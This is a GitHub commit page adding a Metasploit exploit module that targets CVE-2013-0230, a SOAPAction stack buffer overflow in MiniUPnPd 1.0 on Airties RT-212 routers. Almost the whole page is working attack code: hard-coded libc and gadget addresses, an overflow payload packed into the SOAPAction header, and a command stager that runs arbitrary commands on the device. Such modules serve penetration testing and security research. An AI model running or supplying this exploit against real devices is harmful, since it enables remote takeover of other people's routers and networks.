Skip to content

Commit 285d767

Browse files
author
m-1-k-3
committed
initial commit of UPnP exploit for Airties devices
1 parent b6df023 commit 285d767

File tree

1 file changed

+131
-0
lines changed

1 file changed

+131
-0
lines changed
Lines changed: 131 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,131 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class Metasploit3 < Msf::Exploit::Remote
9+
include Msf::Exploit::Remote::HttpClient
10+
include Msf::Exploit::CmdStager
11+
Rank = NormalRanking
12+
13+
def initialize(info = {})
14+
super(update_info(info,
15+
'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
16+
'Description' => %q{
17+
This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
18+
present in the SOAPAction HTTP header handling.
19+
},
20+
'Author' =>
21+
[
22+
'hdm', # Vulnerability discovery
23+
'Dejan Lukan', # orig Metasploit module
24+
'Onur ALANBEL', # exploit for Airties router
25+
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module for Airties router
26+
],
27+
'License' => MSF_LICENSE,
28+
'Platform' => 'linux',
29+
'Arch' => ARCH_MIPSBE,
30+
'References' =>
31+
[
32+
[ 'CVE', '2013-0230' ],
33+
[ 'OSVDB', '89624' ],
34+
[ 'BID', '57608' ],
35+
[ 'EDB', '36839' ],
36+
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
37+
],
38+
'Targets' =>
39+
[
40+
[ 'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0',
41+
{
42+
'Offset' => 2048,
43+
'LibcBase' => 0x2aabd000,
44+
'System' => 0x00031AC0 ,
45+
'CallSystem' => 0x0001CC94 # prepare $a0 and jump to $s0
46+
}
47+
],
48+
],
49+
'DisclosureDate' => 'Mar 27 2013',
50+
'DefaultTarget' => 0))
51+
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
52+
53+
register_options([
54+
Opt::RPORT(5555),
55+
], self.class)
56+
end
57+
58+
def check
59+
begin
60+
res = send_request_cgi({
61+
'method' => 'POST',
62+
'uri' => "/",
63+
})
64+
65+
if res && res.headers['Server'] =~ /miniupnpd\/1.0/
66+
return Exploit::CheckCode::Detected
67+
end
68+
rescue ::Rex::ConnectionError
69+
return Exploit::CheckCode::Unknown
70+
end
71+
72+
Exploit::CheckCode::Unknown
73+
end
74+
75+
def exploit
76+
print_status("#{peer} - Accessing the vulnerable URL...")
77+
78+
unless check == Exploit::CheckCode::Detected
79+
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
80+
end
81+
82+
#
83+
# Build and send the HTTP request
84+
#
85+
print_status("#{peer} - Sending exploit to victim #{target.name}")
86+
execute_cmdstager(
87+
:flavor => :echo
88+
)
89+
end
90+
91+
def execute_command(cmd, opts)
92+
# Build the SOAP Exploit
93+
# a valid action
94+
sploit = "n:schemas-upnp-org:service:WANIPConnection:1#"
95+
sploit << rand_text_alpha_upper(target['Offset'])
96+
sploit << [target['LibcBase'] + target['System']].pack("N") # s0 - address of system
97+
sploit << rand_text_alpha_upper(24) # $s1 - $s6
98+
sploit << [target['LibcBase'] + target['CallSystem']].pack("N")
99+
100+
# 0001CC94 addiu $a0, $sp, 0x18
101+
# 0001CC98 move $t9, $s0
102+
# 0001CC9C jalr $t9
103+
# 0001CCA0 li $a1, 1
104+
105+
sploit << rand_text_alpha_upper(24) #filler
106+
sploit << cmd
107+
108+
# data sent in the POST body
109+
data =
110+
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
111+
"<SOAP-ENV:Envelope\r\n" +
112+
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
113+
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
114+
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
115+
">\r\n" +
116+
"<SOAP-ENV:Body>\r\n" +
117+
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
118+
"</ns1:action>\r\n" +
119+
"</SOAP-ENV:Body>\r\n" +
120+
"</SOAP-ENV:Envelope>\r\n"
121+
122+
send_request_cgi({
123+
'method' => 'POST',
124+
'uri' => "/",
125+
'headers' => {
126+
'SOAPAction' => sploit,
127+
},
128+
'data' => data,
129+
})
130+
end
131+
end

0 commit comments

Comments
 (0)